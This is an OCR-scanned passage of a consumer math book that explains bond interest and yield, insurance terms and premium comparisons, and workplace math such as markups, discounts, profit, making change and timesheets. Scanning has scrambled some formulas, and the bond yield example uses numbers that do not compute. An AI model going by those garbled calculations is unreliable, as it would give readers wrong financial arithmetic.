Bonds generate income, not appreciation. Municipal bonds are 
usually free from federal income tax. And if the bond is for an 
entity in your own state, it’s probably free from state income tax, 
too. 


Calculating interest on bonds 


When you look up bonds on the Internet, you will likely see them 
described in a way similar to this: 


CALIFORNIA ST PUB WKS BRD REGENTS UNIV CALIF-SER E, 
5.00%, 04/01/2029 


Translation? This bond is a California municipal bond (a “muni” 
for the University of California system. It pays an annual interest 
rate of 5.00 percent and (if you don’t sell it) will pay you a little 
money every quarter until April of 2029. Then you get all of your 
original investment back. 


In other words, the money you make with a bond comes in the 
form of interest (tax-free interest, to boot, in this case). To 
calculate what one year’s tax-free interest is, use this formula, 
where i is interest, p is principal, and r is the annual interest rate: 


interest = principal x rate 
i=p(r) 

i= $1,000.00( 0.05) 

i= $50.00 


The example shows that a $1,000 bond earns $50 in interest in 
a year. 


Calculating yield 


Bond yield may be a little higher or lower than the interest rate. 
Yield takes into account whether the bond is selling at a little 
higher than $100 (people want it a lot) or a little less than $100 
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(people don’t want it very much). If you pay a little more, you actu- 
ally earn a little less. You'll still get interest at the “advertised” 
rate, but yield is thought to be a more accurate reflection of a 
bond’s real return on your investment. 


To calculate bond yield, you use this equation: 


interest paid in a year 
market price 


Y =Ż x100 
p 


bond yield = x100 


_ $5.00 
Y= $107,778 * 100 


Y = 0.046391 x 100 
Y = 4.60 


A single bond purchase usually requires that you spend a minimum 
of $5,000. Most people can’t or won’t do that. Instead, they buy 
into a corporate or municipal bond mutual fund, where the 
purchase amount is more flexible (sometimes as little as $1,000). 


You use the same math to determine bond yield as you do for 
dividend yield. 


Chapter 12 


Covering Your Assets: 
Insurance Math 


In This Chapter 
Reviewing what insurance is and how it works 
Looking at the many terms used in insurance 
Looking at the numbers for the major types of insurance 


[ is uncertain, and people usually don’t welcome uncertainty. 
That’s where the concept of insurance comes in. Insurance 
won't prevent bad things (an automobile accident, a house fire, 

or loss of life, for example) from happening, but it can reduce the 
financial loss you face should they happen. 


The idea behind insurance is that you trade a small known cost 
(the payment, called an insurance premium) against a larger 
unknown cost. In this chapter, I tell you how insurance works and 
explain the math you need to know to understand what you’re 
paying for. With insurance, the math consists of simple arithmetic 
you do and statistics that you don’t do but should understand. 


Honing in on How 
Insurance Works 


Simply put, insurance insures you against a “peril,” such as sickness, 
fire, auto accidents, or death. You make payments (called premiums) 
so that, if the peril happens to you, you can make a claim and the 
insurance company pays in the amount and manner specified 

in your policy. In some cases, the insurance company pays you 
money for some of your financial loss; in other cases, the company 
pays a service provider (the body shop you took your car to, for 
example, or the doctors and hospital you saw when you broke 
your leg). 
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When you're trying to decide how much coverage to buy and what 
you can afford, you first need to understand how insurance works — 
a task that takes you into the labyrinthine world of actuaries and risk 
assessment, which I explain in the following sections. 

<r 
Here are a few terms you'll encounter in the world of insurance. 
Knowing them makes understanding the details easier: 


Premium: A premium is the amount of money charged for 
insurance. The term is used for all types in insurance. 


Deductible: A deductible is the amount of money that you 
pay from your own pocket to a service provider (doctor, 
mechanic, contractor, and so on) before an insurer pays a 
benefit. Deductibles are common in automobile insurance 
and health insurance. For auto insurance, you pay a deduct- 
ible when you put in a claim for an accident. For example, if 
you have a $250 deductible on your auto insurance and you 
get into a wreck that causes $3,000 worth of damage, you pay 
the first $250 and the insurance pays the rest. With health 
insurance, over the course of a year, you pay your medical 
expenses yourself until you “meet the deductible.” At that 
point, the insurer starts paying benefits. The next year, the 
deductible resets, and you have to do it all over again. 


Why do deductibles exist? If they didn’t exist, the premiums 
would be out of sight. An insurer feels that, without deductibles, 
people would put in a lot of trivial claims. 


 Copay: In health insurance policies, the copay is the amount 
of a healthcare bill that you pay when a service is provided. 
This isn’t the same as the premium, which you pay to the 
insurance company to buy the insurance. 


 Co-insurance: Co-insurance isn’t exactly the same as a copay. 
Whereas a copay is a fixed amount (you have a $20 copay 
when you go to the doctor’s office, for example), co-insurance 
is the percentage of the medical bill you’re later responsible 
for. If the bill is $200 and your co-insurance amount is 
30 percent, you pay $60 of the bill and the insurance 
company pays 70 percent ($140). 


Copays and co-insurance exist to prevent moral hazard. The 
purpose is to prevent people from seeking medical care that 
may not be necessary. The underlying philosophy is that, with 
no copay or co-insurance, you'll consume more care than you 
would if you weren’t paying anything. Insurers believe copays 
are necessary to keep insurance costs down. 
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Lifetime maximum limits: Health insurance traditionally had 
a lifetime maximum. A lifetime maximum was an expenditure 
cap. When you hit that amount, the insurance company 
wouldn’t pay another dime. It’s true that very sick people can 
run up big medical bills, but ultimately this limitation was 
perceived as too damaging to cancer patients and children 
with severely debilitating conditions. In the United States the 
Affordable Care Act has changed lifetime limits. So this is one 
term you no longer have to remember. 


Spreading risk around 


Insurance companies pay some or all of the costs people incur 
when a calamity strikes. Health insurance started this way — the 
insurance companies would protect patients from expenses asso- 
ciated with emergencies, injuries, or major illnesses, but other 
kinds of healthcare, like routine checkups or ordinary procedures, 
were simply paid for by the patients themselves. Health insurance 
has since absorbed the preventive and routine care portion and 
now contributes toward the payment of nonemergency healthcare 
expenses. 


So here’s the question: How can a business make money if it’s 
responsible for paying for things that, by their very nature, tend to 
be very expensive? The answer is by distributing risk over a large 
pool of people. 


For example, in a pool of 1,000,000 drivers, there may be 1,000 traffic 
accidents, making the probability that a driver will have an accident 
1 in 1,000. The risk is spread over the whole pool. All 1,000,000 
drivers pay a premium, but most drivers won’t have an accident. 
Instead, the premiums paid by the accident-free drivers help pay the 
benefit for the drivers who do have an accident. Not a bad deal. 


Evaluating risks 


You don’t know the exact chances of a peril happening to you, and 
your insurance company doesn’t know either. But the insurer does 
know the statistical chances of it happening. 


An actuary is a professional who analyzes risk and its financial 
impact. Many actuaries work at life insurance and health insurance 
companies, but they also figure risk for auto insurers. They can 
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even determine when an appliance is likely to break down (and 
therefore what the manufacturer should charge for an extended 
warranty). 


Here’s why the actuary’s job is important: The probability findings 
directly impact how much you pay for your coverage. Life insurance, 
for example, has always relied on life tables (also called mortality 
tables) developed by actuaries. It’s 100 percent certain that a 
person will die, but no one knows when. A life table shows the 
probability that a person of a certain age will die before his or her 
next birthday. From that, an insurer can figure the remaining life 
expectancy for people at different ages and base premiums on life 
expectancy. 


You won't be surprised to learn that after infancy, children have an 
excellent chance of living a long time. By contrast, people who are 
older (90 years of age, for example) have a poor chance of living 
another year. That’s why healthy, non-smoking young adults can 
get life insurance for a song, and the elderly have to throw ina 
warm-up act, backup singers, and free backstage passes. 


Probabilistic risk assessment (PRA) is a term for evaluating risks, 
such as those associated with an airliner or a nuclear power plant. 
PRA deals with the likelihood of a detrimental outcome of an 
activity versus the severity of the detrimental outcome. The 
severity (also called the consequences) is expressed numerically 
(for example, number of people hurt or killed, acres destroyed, 
dollars lost, and so forth).Think of PRA as asking “What’s the worst 
that could happen and what are the chances?” 


The risk level is basically the severity multiplied by the probability. 
The formula is 


risk level = hazard severity x likelihood of occurrence 


Life tables 


For most of history, evaluating risk wasn't an exact science. Farmers guessed about 
the likelihood of crop failure, and kings guessed about the likelihood of war. But 
around 1662, John Graunt in London got scientific about death. He noticed predica- 
ble patterns when people in a group died. Graunt produced the first /ife table, based 
on a statistical summary of real experience. To this day, insurance companies still 
rely on life tables, updated of course. 
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Broadly, risk has these levels: 


Low likelihood/low severity: You can pretty much ignore 
these risks. There’s not much chance they’ll happen, and if 
they do, there’s not much cost. Falling down the stairs would 
fall into this category. It’s not likely to happen, but if it does, 
fixing the damage may require only first aid. 


Low likelihood/high severity: Risks that fall into this level 
aren't likely to happen, but when they do, you are in deep 
trouble. For example, an auto accident isn’t a common 
occurrence, but it can produce severe bodily injury and costly 
property damage. 


High likelihood/low severity: These risks are moderate 
because, even though the chances of them happening are 
high, they usually don’t have a hugely detrimental effect. You 
just have to cope with them. An example of this type of risk 
includes cutting yourself while cooking. Here, a good strategy 
is to try to reduce the risk (by being careful when you’re 
slicing). 


High likelihood/high severity: These are top-priority risks 
and can mean big trouble. Those who live in areas subject to 
wildfires, hurricanes, and floods occasionally face this sort 
of risk and often have to evacuate their homes on very short 
notice. The best thing homeowners can do to minimize this 
risk is consider where they live. Flood insurance can help 
“hedge” against a flood and wind insurance may help with 
damage from hurricanes. For wildfires, you can reduce risk by 
keeping combustible brush at least 30 feet from the house. 


Underwriters 


In 1688, ship owners and merchants went to Lloyd's Coffee House in London to talk 
about their ships and the cargoes traveling on them. 


A sea voyage Is risky business — the ship owner or merchant can lose 
everything. A shipwreck can spoil your whole day. So bankers would accept some 
of the financial risk in exchange for a premium. They'd write their names under the 
risk information, and to this day those who accept risk are called underwriters. 


Today, Lloyd's of London is a giant insurance company. And Lloyd's coffee house? 
There's a historical plaque on Lombard Street in London, and the original storefront 
is on display at the National Maritime Museum. 
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Determining premiums 


An insurance premium is the amount you pay for coverage. 
Premiums vary a lot, depending on a number of factors: 


The degree of “peril” you face: For example, as you grow 
older, life insurance costs more because the risk of dying is 
higher. The same is true if you are in a risky profession. With 
other lines of insurance, premiums vary if the insurer believes 
you are at greater risk. For example, a health insurer may 
want to charge you an increased premium if you’re a tobacco 
user. Teen drivers pay more for auto insurance than older, 
more experienced drivers. 


The cost of claims: Premiums grow because the cost of claims 
grows higher and higher. In the world of auto insurance, your 
premium may go up if you get into an accident. In health 
insurance, premiums rise regularly because of the increasing 
costs of healthcare. Also premiums for homeowners around 
the nation jumped up following Hurricane Katrina due to the 
costs the insurance companies incurred in the aftermath of 
that disaster. 


How much coverage you buy: A $20,000 life insurance policy 
costs twice as much as a $10,000 life insurance policy, for 
example. With auto insurance, the premium also depends 
on how much coverage you buy. For example, getting full 
coverage insurance costs more than getting only liability 
insurance. 


In all cases, the insurance company works out the statistics. Your 
real-life math job is to examine the coverages and compare the 
premiums. I tell you how in the next sections. 


Making Calculations about Vour 
Own Lines of Insurance 


Life insurance, health insurance, automobile insurance, and 
homeowner’s insurance are the major personal lines that 
people buy. 


With some insurance, you can pick the amount of coverage and 
then compare premiums. Life insurance is sold in units (typically 
units of $1,000, the total making up the face amount of the policy), 
auto insurance is sold in varying amounts, and health insurance 
has plans with different deductibles and different benefits. Your 
math task related to insurance is usually to compare the coverage 
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offered to the premiums charged and pick the plan that works best 
for you. 


A personal line of insurance covers individuals and their property. 
A business line of insurance covers business property (such as 
buildings and ships) and business activities (which may cause 

a professional liability). To split hairs, the health insurance your 
employer offers you is a business line, sold to the corporation 

by a corporate insurance agent. 


Auto insurance 


When you look for auto insurance (or evaluate the plan you 
already have), you need to consider things like the value of the 
vehicle you’re insuring and how much you can afford to pay as the 
consequences of an accident. Both affect the kind and amount of 
insurance you need and the amount you'll end up spending for it. 


Some coverages levels have minimums, mandated by the state you 
live in, but others coverages are flexible and will affect how much 
or how little you pay. 


«ER When you review your auto insurance policy or look for a new 
& policy, you’ll see separate charges for up to six items: property 
damage, bodily injury, collision, comprehensive, medical, and 
uninsured motorist coverage. There’s also a limited form of 
coverage called PLPD (personal or public liability and property 
damage insurance). 


Value of your vehicle 


What’s your car worth to you? Chances are it’s worth a lot less to 
the insurance company. Collision insurance pays for damage to 
your car (damage to the other driver’s car is covered by property 
damage insurance). Collision insurance also pays if you drive your 
car into a tree or your other car (as I did once). 


The amount of collision coverage will be “actual cash value less 
deductible.” After an accident, your insurer determines your car’s 
value and what it would cost to repair it; you can only select the 
deductible. (Of course, collision coverage may be optional, but 
you're taking your chances if you opt out.) 


Say your $22,000 car was worth $6,000 before an accident. If 
there’s a lot of damage (a total loss), the car may not be worth 
fixing. If the salvage value of the car is $500, the insurer doesn’t 
have to pay more than $5,500 in repairs. The company can take the 
car and just give you a check for $5,500. That’s what is meant by 
your car being “totaled.” 
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Certain cars — performance cars, luxury cars, and cars that are 
most often stolen, for example — cost more to insure. Before you 
buy a new car, call up an insurance agent or go online to see what 
the going rate for insuring that kind of car is. 


Amount of deductible 


Sure, having a low deductible sounds great. After all, wouldn’t it 
be nice to not have to shell out anything (or shell out very little) in 
the event of an accident? However, low-deductible coverage costs 
more. So you need to balance the premium cost with the deductible 
amount before deciding. 


Auto insurers will not give you a cost comparison of deductibles 
versus premiums online. To make a comparison, you usually need 
to talk over the phone with an agent. When you see the impact of 
different deductibles on premiums, then you can subtract to see 
the savings from a higher deductible. 


Homeowner's insurance 


Homeowner’s insurance is useful for insuring your house against 

fire, theft, and a giant tree falling on the roof. Homeowner policies 
usually have some liability coverage (“slip-and-fall insurance”) in 

case someone’s injured on your property. Renter’s insurance is a 
variation of homeowner’s, intended for renters. 


When you’re buying insurance to cover theft or destruction of 
personal property, you may have a choice between actual cash 
value or replacement cost. 


Actual cash value: With actual cash value, in the event of a 
loss, the insurance company reimburses you the amount that 
the item is worth today. For example, if you have a lightning 
strike that wipes out your 3-year old TV, your 15-year old 
dishwasher, and your 1-year old computer, you get only what 
those items are worth today, regardless of what you paid for 
them new and how much they would cost to replace now. 
Bottom line: You probably couldn’t replace the lost items for 
what the insurance company will pay. 


Replacement cost: With replacement cost, the insurance 
company reimburses you for the amount that the lost item 
would cost if you were to buy a similar item at today’s prices. 
As you might imagine, replacement cost is the more expensive 
coverage. 


MBER 
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When you’re insuring personal property, you want to value the 
items you’re insuring. Make a list showing what you own, when 
you bought it, and how much it originally cost. (Digital photos 
are helpful, too, in case you have a dispute with the insurance 
company.) 


Health insurance 


Health insurance is trickier to understand than other kinds of 
insurance because of how complicated it is, due to various types of 
coverage, various deductibles, discounts negotiated between the 
service provider and the health insurance company, copays, 
co-insurance amounts, and so on. 


The best real-life math approach is to understand your health 
insurance policy (which isn’t always easy) and to keep track of 
your medical expenses. The following sections tell you what kind 
of info you have to wade through to make sense of your medical 
bills and how you can anticipate your share of the totals. 


Health insurance doesn’t insure your health. It insures you against 
a portion of your financial losses. The only real “health insurance” 
comes from diet, exercise, and regular doctor visits when you’re 
well. Be sure not to forget prenatal care, either. 


Deciphering your bill 


Even highly intelligent people can go insane trying to decipher 
their medical bills. Take a look at Figure 12-1, which shows a health 
insurance explanation of benefits. 


**PLEASE REFER TO THE BACK OF THIS DOCUMENT FOR ANY ADDITIONAL INFORMATION** 


Type of Service Total PPO Not Covered Total 
Service Date Code | Charges |Discount| Covered | Amount | Copay |Balance| Payment | See Remarks 
OP DRS VISIT | 06/26/2012 | 99213 107.00 58.25 48.75 RR PH AG 08 
OP RADIO & LAB | 06/26/2012 | 93000 31.00 31.00 RR 12 AG 08 
RS Withholding: 
Total Billed Charges: $138.00 Adjustment Due to Other Insurance: 
Total Paid: 


Patient Liability: $79.75 
(Patient Liability includes all applicable copayments, co-insurance, deductibles and non-covered items) 


PAYMENT SUMMARY SECTION 
Payment made to: PPO Discount Total: $58.25 
Amount Paid: Base Deductible: 
Check Number: Optional Benefit Deductible: $31.00 


Illustration by Wiley, Composition Services Graphics 


Figure 12-1: Health insurance explanation of benefits statement. 
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What you may have noticed with health insurance explanations of 
benefits is that they aren’t necessarily easy to understand. Here’s 
what the fields in an explanation of benefits statement (EOB) mean 
(keep in mind that the EOB you receive may differ): 


Total charges: This reflects what the doctor charges for 
a service. 


PPO discount: This is amount that the doctor agreed to let go 
of because his or her practice is part of a preferred provider 
organization (PPO) network that negotiated a lower fee for 
that service. (This is one reason why seeing a doctor who’s 
“in the network” is supposed to make your payments lower.) 


Not covered: Some services (or portions of a service) aren’t 
covered by your policy. In this statement, $48.75 of the $107 
visit wasn’t covered by insurance. You’re responsible for this 
amount. 


Covered: The insurance company will normally pay all $31 of 
the lab charges. 


Optional benefit deduction: Even though the $31 lab fee is 
covered, you haven’t met the deductible, so you’re paying 
the $31. 


Patient liability: You owe $79.75, and that’s the fact. It’s a 
combination of $48.75 for the visit and $31 for the lab work. 


Code: This is the procedure code; it’s the way the doctor’s 
office indicates what kind of service was provided. You'll 
never find out what these codes mean without the Internet — 
and it’s not on the back of the explanation. In the example, 
99213 stands for “15 minute visit with established patient.” 


Although every insurance company has its own explanation of 
benefits form, they all use terms similar to those in the preceding 
list. Understand those, and you’re that much closer to understand- 
ing your medical bills. Your real-life task is to tear out your hair, 
subtract what you can, and add up what’s left. You then wait for 
the doctor’s bill (which will reflect the insurance company’s pay- 
ment) and pay the balance. For a specific rundown of what your 
EOB or billing statement shows, call your healthcare provider’s 
billing office. 


Choosing between high premiums or high deductibles 


Plans with lower deductibles are more expensive. “Cadillac plans,” 
for example, have generous benefits and lower deductibles; 
therefore, their premiums are higher. To keep premiums affordable, 
you may want to choose a plan with a higher deductible so that 
you can reduce the amount of money you pay in premiums to the 
insurance company. 


ae 
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However, a high deductible/low premium plan isn’t always the best 
choice, depending on your circumstances. To determine whether 

a high deductible/low premium plan is better for you than a high 
premium/low deductible plan, you need to assess how likely you 
are to need medical care during a year and at what point the 
amount you save in deductible offsets the amount you pay in 
premiums. 


Say, for example, that you have to choose between a plan with 

a $2,000 deductible that costs $600 per month and a plan with a 
$5,000 deductible that costs $400 per month. The difference in 
premiums is $200 per month, and the difference in deductibles is 
$3,000. Your job is to save $3,000 to make up for the difference in 
deductibles. So divide the $3,000 by the $200 monthly premium 
savings to see that after 15 months, you’ll have enough in the bank 
to make up for any difference for a major illness. For minor things, 
such as doctor visits and lab procedures, don’t try. You probably 
won’t “meet the deductible” in either case. 


Life insurance 


Life insurance comes in many forms, mainly whole life (cash 
value) insurance, term life insurance, and annuities. When you’re 
employed by a large company, chances are that it may offer you 
free term life insurance equal to your annual salary, with the 
option of buying two or three times that amount at a low rate. 


Term life insurance insures your life for a fixed period of time, such 
as 5 years, 10 years, or 20 years. It’s fairly low cost. To determine 
your premium, simply multiply the number of units you want (say 
one hundred $1,000 units of 5-year term life insurance) by the 
annual premium per unit (say $1.00). In this example, the annual 
premium is $100. 


Sometimes, the insurance company simply advertises its total 
premium. For example, you may see “$250,000 coverage, 20 years, 
$177.50 annual,” and that pretty much tells you the whole story. 


Whole life insurance insures your life until you die, which (for 
five-year-olds) may be 90 years in the future. Even though your 
chances of dying increase each year (and the premium should 
increase as well), people prefer /evel-premium insurance. That is, 
the premiums stay the same over the entire life of the insurance 
contract. That means you pay a little more than necessary in the 
early years and a little less than necessary in the later years. Over 
time, an excess accumulates, and it’s known as the cash value of 
the policy. Again, to determine your premium, simply multiply the 
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number of units you want (say ten $1,000 units of whole life insur- 
ance) by the annual premium per unit (say $6.00). In this example, 
the annual premium is $60. 


In the case of life insurance, you may buy additional coverage, 
called riders. These include spouse riders, mortgage payoff riders, 
and guaranteed insurability option riders. 


How do | insure thee? 
Let me count the ways 


If you look at all the insurances available, your head will spin, a condition not 
usually covered in health insurance policies. Here’s the lightning round of some 
forms of insurance other than those covered in this chapter. 


YY Private mortgage insurance (PMI) is also known as lenders mortgage 
insurance. It’s insurance against your defaulting on your home loan. The bank 
gets the benefit and you pay the premium. You can read more about this in 
Chapter 10. 


ı# Unemployment insurance (UI) is paid by your employer. You get a benefit should 
you lose your job through no fault of your own. Note that UI is insurance, not a 
handout or any form of “welfare.” 


State disability insurance is insurance you pay through payroll deduction. It 
pays medical benefits for on-the-job injuries. 


1#” Non-medical health insurance (if that's not too much of a contradiction) 
includes disability income insurance, long-term care insurance, and Medicare 
supplement coverage (Medigap). 


ı# Pet insurance has grown in popularity. You can insure your pet against illness, 
accident, or death. 


ı# Cruise insurance protects your investment in a cruise if, say, a hurricane or 
other travel disaster prevents you from going or prevents the cruise from taking 
place. For small trips, it's not so important, but for a $20,000 once-in-a-lifetime 
cruise, buying cruise insurance is probably an excellent idea. 


Chapter 13 
Taking Math to Work 


In This Chapter 


Calculating markups, discounts, and time and material costs 


Getting familiar with the different kinds of profit 
Filling out your timesheet and project accounting sheet 
Comparing what you make to what you take home 


H ow much math does your job require? For better or worse, 
most jobs don’t require much math. The exception is when 
you're a bank teller, an accounting clerk, a retail clerk, or a chief 
financial officer — and even then a lot of the math is “hidden” 
from you. It’s handled inside the cash register or by the proprietary 
accounting software your company uses. 


Even if you don’t do math on the job, knowing a bit about business 
math is very helpful. Business math encompasses everything from 
the high-flying items, such as complex calculations that should be 
left to experts, to the low-flying items that everyone who earns a 
paycheck should know. Guess which one I cover in this chapter? 
(Hint: Think of the topics as an incredibly brief course in Business 
Math Lite.) 


Setting Prices 


Profit comes from the difference between wholesale and retail 
prices. Wholesale prices are the prices that the business spends 

to buy items. Retail prices are the prices the business charges for 
items. For example, a business may buy a widget from a wholesaler 
for a price of $0.50 (the wholesale price) but turn around and sell 
the widget to customers for $2.00 (the retail price). 
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Stores offer discounts (the difference between an item’s regular 
price and its sale price) in order to improve sales. Although the 
business charges less, it can make up that “lost” profit because 
people love sales. Discounting merchandise (the theory goes) will 
increase a store’s volume of sales. While they are in the store, 
customers might even buy items that aren’t on sale. 


These two concepts — setting retail prices and offering discounts — 
give rise to special calculations that you need to know about, 
whether you’re on the buying end of the transaction or the 

selling end. 


Managing markups 


A markup is the difference between the cost of goods and services 
and their selling price. You express the markup as a percentage of 
the wholesale price. Of course, the selling price is supposed to be 
high enough to create a profit. 


To calculate a product’s markup, you subtract the wholesale price 
from the selling price and then divide the result by the wholesale 
price. Suppose, for example, that the wholesale price for an item is 
$1.50 and the retail price is $2.50. You can use this formula to 
calculate the markup percentage: 


(selling price- wholesale price) 
wholesale price 
($2.50- $1.50) 
$1.50 


51:50 %100 


markup = 0.67 x 100 
markup = 67 


x 100 


markup = 


markup = x 100 


markup = 


An item that costs $1.50 and sells for $2.50 has been marked 
up 67 percent. 


If the boss asks you to mark up a new item by 30 percent, use 
this formula: wholesale price x (1 + markup). In this example, the 
wholesale price is $1.50: 


selling price = wholesale price x (1+ markup) 
selling price = $1.50 x (1+ 0.30) 

selling price = $1.50 x 1.30 

selling price = $1.95 
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When you mark an item with a wholesale price of $1.50 up 
by 30 percent, you sell it for $1.95. 


Figuring discounts 


Discounts lower the selling price of goods or services. 


The formula for figuring a discount is way simple. Just multiply the 
regular price by 1 minus the discount rate. Suppose, for example, 
that you want to discount an item that regularly costs $2.50 by 20 
percent. Use this formula: 


sale price = regular price x (1— discount rate) 
sale price = $2.50 x (1-— 0.20) 

sale price = $2.50 x 0.80 

sale price = $2.00 


When you discount an item 20 percent, you sell it for 80 percent of 
its regular price. If you apply a 20 percent discount to an item with 
a regular retail price of $2.50, its sale price tag is $2.00. 


Quantity pricing produces lower prices, too, but it’s not a 
discount. See Chapter 5 for details. 


Predicting time and materials costs 


Time and materials (also known as labor and materials) is a 
standard phrase in some construction contracts. The customer 
agrees to pay labor rates for actual hours worked and for the 
actual costs of materials used. It’s open-ended, the opposite of 
a fixed-price contract. Automobile mechanics and plumbers do 
something similar. Your bill reflects materials used and labor 
hours expended. 


Some contracts guarantee a maximum price, which puts a limit 
on the total charges. At my company, we call it an NTE (“Not To 
Exceed”) price. 


The formula for calculating time and materials is very simple: 
You simply determine the price for the time (multiply the hours 
worked, or estimated to be worked, by the per-hour price) and 
then add in the price of parts and any applicable sales tax. 
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Bumping into business numbers 


Various business numbers have names. If you know the names and the basic 
calculations to derive them, you'll be an expert in no time at all. (Or at least you'll 
appear to be an expert.) 


1# Income: Income (sometimes called revenue) is money your company takes in 
from selling goods and services. Selling an asset (like a truck) isn't income. 


Expenses: The term expenses refers to the money your company spends to 
make products and deliver services. Expenses are also called costs. Buying an 
asset (like a truck) isn't an expense. True, the purchase reduces the company’s 
cash, but it gets a truck. 


There are two kinds of costs: direct and indirect: 


Direct costs: These costs are tied directly to making a product or delivering a 
service. Direct costs are pretty easy to figure out. Each product your company 
makes (for example, a pair of denim pants) requires a certain dollar amount for 
materials (for example, denim, thread, zippers, and buttons) and labor. Direct 
costs make up the cost of goods sold. 


YY Indirect costs (also known as overhead): These costs aren't directly 
applicable to the product itself and include things like administration, personnel, 
and vehicles. Indirect costs make up operating expenses. 


Consider this automobile repair example. Here, the hours are 
worked out to the hundredth of an hour, and the labor rate is 
figured at three decimal places: 


total charges = (hours x hourly rate) + parts + tax 
total charges = (4.17 x $89.928 ) + $390.40 + $30.74 
total charges = $375.00 + $390.40 + $30.74 

total charges = $796.14 


By the way, the example total is exactly what it costs to replace a 
timing belt on a 2005 Honda Civic. 
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Paying Attention to Profit 


Businesses are in business to make money — a concept even kids 
selling lemonade in their front yard understand. But whereas little 
Molly is happy to end up with a profit of a few extra dollars at the 
end of her lemonade-selling season (and gives it no more thought 
than what she can spend it on the next time Mom takes her to the 
store), businesses have to parse their profit a little more finely. 


Calculating profit margin 


The profit margin (or just plain margin) is the net income divided 
by the selling price (also called revenue). The net income for an 
item is the selling price less the wholesale price. To calculate the 
profit margin, use this formula: 


(selling price — wholesale price) 
selling price 
($2.50 - $1.50) 
$2.50 


$1.00 
$2.50 * 100 


margin = 0.40 x 100 
margin = 40 


margin = x 100 


margin = x 100 


margin = 


When you sell an item with a wholesale price of $1.50 for $2.50, the 
net income is $1.00. The profit margin is 40 percent. 


Determining gross profit 


Gross profit is sales less the cost of goods sold. In a service 
company, such as a landscaping service, the cost of goods sold 
includes the cost of labor to do the landscaping. Here’s the formula: 


gross profit = sales — cost of goods sold 


If that was the end of it, everything would be fine, but there’s more. 
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Pre-tax profit 


Pre-tax profit (sometimes called operating profit) is what you get 
after you subtract all the operating expenses from the gross profit. 
Here’s the formula: 


pre-tax profit = gross profit — operating expenses 


The operating expenses include overhead. See the sidebar 
“Bumping into business numbers.” 


Net profit 


Net profit is the logical end to figuring the company’s bottom line. 
To get net profit, you subtract taxes and interest from pre-tax 
profit. 


net profit = pre-tax profit — taxes — interest 


Making Change 


No matter what your career, the realities of business are that you 
buy and sell. If you buy for cash, you receive change in return. 

If you sell for cash, you’re expected to give change. Either way, 
knowing how to make change accurately is a good idea. 


Making change is the technique of returning to a customer the 
difference in cash between the amount of a purchase and the 
money tendered. Change refers mainly to loose coins, but in reality 
it regularly includes paper money. 


The modern school of change-making uses a “no-math” technique. 
Basically, the cash register tells the clerk the charges. You give the 
clerk money, and he or she enters the “amount tendered” into the 
register. The cash register tells the clerk what change to give you. 
This method is usually fast, efficient, and accurate, but if the regis- 
ter isn’t working, you will sometimes see the clerk struggle. If you 
don’t know how to count change, you'll struggle as well, and it’s 
anybody’s guess whether you’re getting back what you’re owed. 

In addition, some “businesses” — church or school bake sales, for 
example — won’t have automated cash registers. 


What do you do? You count out change the way your grandmother 
did when she worked at Woolworth’s decades ago. Say your 
customer makes a $9.56 purchase and gives you a $10 bill. 
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1. Leave the bill in plain sight on top of the cash drawer or 
cash box. 


2. Count the change out and give it back by “Speaking the 
change.” 


In this method, you describe what you’re giving back. Start 
with the smallest coins. 


“Your purchase was $9.56, out of $10.00. That’s $9.56,” 
“plus 4 cents (4 pennies) makes $9.60,” 

“plus 5 cents (a nickel) makes $9.65,” 

“plus 10 cents (a dime) makes $9.75,” 

“plus 25 cents (a quarter) makes $10.00.” 


No confusion, no error, and — if you’ll notice — no math! 


Tracking Vour Time 


Your time is the most precious commodity you have. On the job, 
you'll see many measurements of time. Management measures the 
hours of operation of machine tools (for maintenance) and the 
time to produce items (for productivity). If you’re a person on the 
job, you have two key elements of time to track: the hours you’ll be 
paid for working and the hours you expend on different projects. 


The timesheet 


Most people are paid by the hour. They’re called “non-exempt 
employees,” because they aren’t exempt from overtime laws (and 
that can be a very good thing). 


A timesheet is a common form used to record the time you spend 
doing your work. These forms come in many variations (and if 
you've worked at several different companies, you’ve undoubtedly 
seen several “flavors”). Figure 13-1 shows a simple timesheet. 


The key task is to record your time accurately and do a little bit of 
addition. 
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Willow Valley Software 
562 Brock Road 
Nevada City, California 95959 
530/265-4705 


PROFESSIONAL SERVICES TIMESHEET 


NAME: Joe Writer WEEK ENDING DATE: 04/12/2012 
PAYROLL 
MON WED | THU 
Regular hours 8 8 


Overtime hours 


Vacation hours 


Holiday hours 


TOTAL 8 


TOTAL PAYROLL HOURS 40 | 
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Figure 13-1: A timesheet. 


To complete a simple timesheet, you generally have to record the 
hours you work each day in the appropriate box or field and then 
add them up to give the total hours each day, the total hours each 
week, and so on. Timesheet math is all about addition. For the 
timesheet shown in Figure 13-1, for example, follow these steps: 


1. Enter the number of hours you worked each day, separated 
into the given categories. 


2. Add up each day’s hours and place the total at the bottom 
of each column. 


3. Add across each row to total each category and place that 
number in the right-hand column. 


4. Enter the total for the week. 


The sum of each day’s hours should agree with the sum of 
the category hours. 


Note that this timesheet has room for overtime hours, but the 
company doesn’t generally authorize overtime. For more on 
overtime, see the section “Calculating your gross pay.” 


You may work in a place that has a time clock. You “clock in” when 
you arrive and “clock out” for lunch. Then you “clock in” after 
lunch and “clock out” when you leave. The way to figure out the 
morning and afternoon hours so that you know how many hours 
you worked in a day is to subtract times. If you clocked in at 8:00 a.m. 
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and left for lunch at 12:30, for example, you figure the difference: 
4.5 hours. Then, to figure your afternoon hours, you subtract your 
ending time (say, 5:30 p.m.) by the time you clocked back in from 
lunch (say, 1:30): 4 hours. Add your morning and afternoon hours 
together to get your total hours worked (8.5 hours). (Note: Many 
time clocks use military time, but the math is the same.) 


Heavens, no — Not project 
accounting! 


Heavens, yes! You always report time on the job for payroll 
purposes, but often you’re also required to do project accounting. 
Project accounting allows management to track which projects 
consume employee time. (This information is often necessary if 
projects are budgeted for a certain total number of hours to 
complete.) Figure 13-2 shows a project accounting entry sheet. 
Notice how similar it is to a timesheet. Basically, the task is the 
same; you just separate each day’s hours differently. Rather than 
categorizing hours as regular, overtime, and so on, you categorize 
them by project (the cryptic codes in the left-hand column in the 
figure, for example). Project accounting math is easy. Just record 
correctly and add. 


NAME: Joe Writer PROJECT ACCOUNTING Week Ending: 04/12/2012 
PROJECT MON THU SAT | SUN | TOTAL 


20 
10 
10 


CIWMB Training 8 
CIWMB Editing Services 
CIWMB Assistance 

HP —CASL 

HP -XP 


TOTAL PROJECT ACCOUNTING HOURS 40 | 
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Figure 13-2: A project accounting sheet. 


In this example, Joe Writer spent all of Monday, all of Tuesday, and 
half of Wednesday on CIWMB Training. The rest of his 40 hours 
